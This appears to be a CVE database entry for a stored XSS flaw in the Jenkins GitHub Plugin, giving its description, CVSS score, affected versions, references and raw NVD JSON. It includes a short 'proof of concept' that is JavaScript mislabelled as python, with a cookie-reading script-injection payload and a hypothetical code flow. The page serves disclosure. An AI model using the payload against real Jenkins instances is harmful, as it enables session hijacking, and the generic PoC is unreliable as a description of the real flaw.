CVE-2026-42523

Description

Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job URL as part of JavaScript implementing validation of the feature "GitHub hook trigger for GITScm polling", resulting in a stored cross-site scripting (XSS) vulnerability exploitable by non-anonymous attackers with Overall/Read permission.

CVSS Details

CVSS Score

9.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* - VULNERABLE

Jenkins GitHub Plugin 1.46.0 及更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-42523
// Exploit: Stored XSS via Job URL in GitHub Plugin

// Attacker injects malicious payload into the Job Name or URL parameter
var maliciousPayload = '"><script>alert(document.cookie)</script>';

// The vulnerable plugin constructs JavaScript for validation using the Job URL
// Hypothetical vulnerable code flow:
// var currentJobUrl = "/job/" + maliciousPayload + "/";
// document.write("Validating hook for: " + currentJobUrl);

// When an admin views the job configuration or related page,
// the payload executes in the context of the admin's session.
console.log("Payload injected: " + maliciousPayload);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42523
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42523
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42523/
[4] VulDB https://vuldb.com/cve/CVE-2026-42523
[5] https://www.jenkins.io/security/advisory/2026-04-29/#SECURITY-3704

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42523", "sourceIdentifier": "[email protected]", "published": "2026-04-29T14:16:19.360", "lastModified": "2026-05-05T18:06:19.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job URL as part of JavaScript implementing validation of the feature \"GitHub hook trigger for GITScm polling\", resulting in a stored cross-site scripting (XSS) vulnerability exploitable by non-anonymous attackers with Overall/Read permission."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*", "versionEndExcluding": "1.46.0.1", "matchCriteriaId": "162727B7-EF1E-4E69-A191-1F9DDE585A37"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-04-29/#SECURITY-3704", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}